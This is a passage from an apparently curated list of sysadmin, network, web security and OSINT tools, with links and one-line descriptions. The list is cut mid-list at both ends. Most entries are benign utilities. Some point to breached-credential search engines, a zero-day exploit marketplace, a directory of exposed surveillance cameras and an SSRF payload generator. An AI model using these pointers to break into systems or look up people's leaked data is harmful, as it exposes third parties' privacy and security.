##### :black_small_square: TOR <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a> - script to make Tor Network your default gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/multitor"><b>multitor</b></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://irssi.org"><b>Irssi</b></a> - is a free open source terminal based IRC client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weechat.org/"><b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a> - tools for Linux/Unix sysadmins.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rgburke/grv"><b>GRV</b></a> - is a terminal based interface for viewing Git repositories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jonas.github.io/tig/"><b>Tig</b></a> - text-mode interface for Git.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a> - simplified and community-driven man pages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mholt/archiver"><b>archiver</b></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tj/commander.js"><b>commander.js</b></a> - minimal CLI creator in JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tomnomnom/gron"><b>gron</b></a> - make JSON greppable!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/itchyny/bed"><b>bed</b></a> - binary editor written in Go.<br> </p> #### GUI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Terminal emulators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Guake/guake"><b>Guake</b></a> - is a dropdown terminal made for the GNOME desktop environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnometerminator.blogspot.com/p/introduction.html"><b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sw.kovidgoyal.net/kitty/"><b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/"><b>Wireshark</b></a> - is the worldโ€™s foremost and widely-used network protocol analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ettercap-project.org/"><b>Ettercap</b></a> - is a comprehensive network monitor tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://etherape.sourceforge.io/"><b>EtherApe</b></a> - is a graphical network monitoring solution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetsender.com/"><b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ostinato.org/"><b>Ostinato</b></a> - is a packet crafter and traffic generator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jmeter.apache.org/"><b>JMeterโ„ข</b></a> - open source software to load test functional behavior and measure performance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/locustio/locust"><b>locust</b></a> - scalable user load testing tool written in Python.<br> </p> ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.torproject.org/"><b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br> </p> ##### :black_small_square: Password Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keepassxc.org/"><b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enpass.io/"><b>Enpass</b></a> - password manager and secure wallet.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hexchat.github.io/index.html"><b>HexChat</b></a> - is an IRC client based on XChat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pidgin.im/"><b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br> </p> ##### :black_small_square: Messengers (end-to-end encryption) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.signal.org/"><b>Signal</b></a> - is an encrypted communications app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wire.com/en/"><b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://matrix.org/"><b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.sublimetext.com/3"><b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://code.visualstudio.com/"><b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atom.io/"><b>Atom</b></a> - a hackable text editor for the 21st Century.<br> </p> #### Web Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/viewMyClient.html"><b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caniuse.com/"><b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://panopticlick.eff.org/"><b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://privacy.net/analyzer/"><b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://browserleaks.com/"><b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.howsmyssl.com/"><b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://suche.org/sslClientInfo"><b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br> </p> ##### :black_small_square: SSL/Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/"><b>SSLLabs Server Test</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.ssllabs.com/ssltest/"><b>SSLLabs Server Test (DEV)</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/ssl/"><b>ImmuniWebยฎ SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.jitbit.com/sslcheck/"><b>SSL Check</b></a> - scan your website for non-secure content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.ssltools.com"><b>SSL Scanner</b></a> - analyze website security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/"><b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://urlscan.io/"><b>urlscan.io</b></a> - service to scan and analyse websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://report-uri.com/home/tools"><b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://csp-evaluator.withgoogle.com/"><b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uselesscsp.com/"><b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whynohttps.com/"><b>Why No HTTPS?</b></a> - top 100 websites by Alexa rank not automatically redirecting insecure requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ciphersuite.info/"><b>TLS Cipher Suite Search</b></a><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a> - strong ciphers for Apache, Nginx, Lighttpd, and more.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2ton.com.au/dhtool/"><b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://badssl.com/"><b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tlsfun.de/"><b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sslmate.com/caa/"><b>CAA Record Helper</b></a> - generate a CAA policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ccadb.org/resources"><b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://certstream.calidog.io/"><b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crt.sh/"><b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hardenize.com/"><b>Hardenize</b></a> - deploy the security standards.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/suite/"><b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.urlvoid.com/"><b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytxt.org/"><b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br> </p> ##### :black_small_square: HTTP Headers & Web Linters <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityheaders.com/"><b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://observatory.mozilla.org/"><b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webhint.io/"><b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security, and more.<br> </p> ##### :black_small_square: DNS <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslookup.org/"><b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslytics.com/"><b>DNSlytics</b></a> - online DNS investigation tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsspy.io/"><b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zonemaster.iis.se/en/"><b>Zonemaster</b></a> - helps you to control how your DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://findsubdomains.com/"><b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsdumpster.com/"><b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnstable.com/"><b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intodns.com/"><b>intoDNS</b></a> - DNS and mail server health checker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.buddyns.com/delegation-lab/"><b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnssec-debugger.verisignlabs.com/"><b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nip.io/"><b>nip.io</b></a> - dead simple wildcard DNS for any IP Address.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ceipam.eu/en/dnslookup.php"><b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whatsmydns.com"><b>What's My DNS</b></a> - DNS propagation checking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/"><b>DNSGrep</b></a> - quickly searching large DNS datasets.<br> </p> ##### :black_small_square: Mail <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://luxsci.com/smtp-tls-checker"><b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mxtoolbox.com/SuperTool.aspx"><b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.checktls.com/index.html"><b>Secure Email</b></a> - complete email test tools for email technicians.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dkimvalidator.com/"><b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br> </p> ##### :black_small_square: Encoders/Decoders and Regex testing <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.url-encode-decode.com/"><b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uncoder.io/"><b>Uncoder</b></a> - the online translator for search queries on log data.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regex101.com/"><b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regexr.com/"><b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regextester.com/"><b>RegEx Testing</b></a> - online regex testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regexpal.com/"><b>RegEx Pal</b></a> - online regex testing tool + other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gchq.github.io/CyberChef/"><b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br> </p> ##### :black_small_square: Net-tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://toolbar.netcraft.com/site_report"><b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atlas.ripe.net/"><b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.robtex.com/"><b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytrails.com/"><b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.keycdn.com/curl"><b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://extendsclass.com/"><b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ping.eu/"><b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://network-tools.com/"><b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bgpview.io/"><b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://isbgpsafeyet.com/"><b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://riseup.net/"><b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.virustotal.com/gui/home/upload"><b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br> </p> ##### :black_small_square: Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.privacytools.io/"><b>privacytools.io</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers"><b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br> </p> ##### :black_small_square: Code parsers/playgrounds <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellcheck.net/"><b>ShellCheck</b></a> - finds bugs in your shell scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://explainshell.com/"><b>explainshell</b></a> - get interactive help texts for shell commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jsbin.com/?html,output"><b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://codesandbox.io/"><b>CodeSandbox</b></a> - online code editor for web application development.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.repl.it/"><b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br> </p> ##### :black_small_square: Performance <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtmetrix.com/"><b>GTmetrix</b></a> - analyze your siteโ€™s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://performance.sucuri.net/"><b>Sucuri loadtimetester</b></a> - test here the performance of any of your sites from across the globe.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.pingdom.com/"><b>Pingdom Tools</b></a> - analyze your siteโ€™s speed around the world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pingme.io/"><b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://developers.google.com/speed/pagespeed/insights/"><b>PageSpeed Insights</b></a> - analyze your siteโ€™s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://web.dev/"><b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a> - automated auditing, performance metrics, and best practices for the web.<br> </p> ##### :black_small_square: Mass scanners (search engines) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://censys.io/"><b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shodan.io/"><b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2000.shodan.io/#/"><b>Shodan 2000</b></a> - do you use Shodan for everyday work? This tool looks for randomly generated data from Shodan.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://viz.greynoise.io/table"><b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zoomeye.org/"><b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://netograph.io/"><b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fofa.so/"><b>FOFA</b></a> - is a cyberspace search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.onyphe.io/"><b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intelx.io/"><b>IntelligenceX</b></a> - is a search engine and data archive.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://app.binaryedge.io/"><b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wigle.net/"><b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://publicwww.com/"><b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inteltechniques.com/index.html"><b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hunter.io/"><b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ghostproject.fr/"><b>GhostProject?</b></a> - search by full email address or username.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.databreaches.live/"><b>databreaches</b></a> - was my email affected by data breach?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weleakinfo.com"><b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pulsedive.com/"><b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://buckets.grayhatwarfare.com/"><b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vigilante.pw/"><b>Vigilante.pw</b></a> - the breached database directory.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://builtwith.com/"><b>builtwith</b></a> - find out what websites are built with.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nerdydata.com/"><b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://zorexeye.com/"><b>zorexeye</b></a> - search for sites, images, apps, softwares & more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.mmnt.net/"><b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://osintframework.com/"><b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.maltiverse.com/search"><b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/main/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.weleakinfo.com/"><b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pipl.com/"><b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://abuse.ch/"><b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybercrime-tracker.net/index.php"><b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a> - find GitHub secrets in real time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searchcode.com/"><b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://opendata.rapid7.com/"><b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webtechsurvey.com/common-response-headers"><b>Common Response Headers</b></a> - the largest database of HTTP response headers.<br> </p> ##### :black_small_square: Generators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thispersondoesnotexist.com/"><b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://generated.photos"><b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fakeface.co/"><b>fakeface</b></a> - fake faces browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.intigriti.io/redirector/"><b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br> </p> ##### :black_small_square: Passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://haveibeenpwned.com/"><b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.dehashed.com/"><b>dehashed</b></a> - is a hacked database search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> </p> ##### :black_small_square: CVE/Exploits databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cve.mitre.org/"><b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cvedetails.com/"><b>CVE Details</b></a> - CVE security vulnerability advanced database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.exploit-db.com/"><b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0day.today/"><b>0day.today</b></a> - exploits market provides you the possibility to buy zero-day exploits and also to sell 0day exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sploitus.com/"><b>sploitus</b></a> - the exploit and tools database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cxsecurity.com/exploit/"><b>cxsecurity</b></a> - free vulnerability database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulncode-db.com/"><b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cveapi.com/"><b>cveapi</b></a> - free API for CVE data.<br> </p> ##### :black_small_square: Mobile apps scanners <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/mobile/"><b>ImmuniWebยฎ Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vulnerabilitytest.quixxi.com/"><b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ostorlab.co/scan/mobile/"><b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br> </p> ##### :black_small_square: Private Search Engines <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startpage.com/"><b>Startpage</b></a> - the world's most private search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searx.me/"><b>searX</b></a> - a privacy-respecting, hackable metasearch 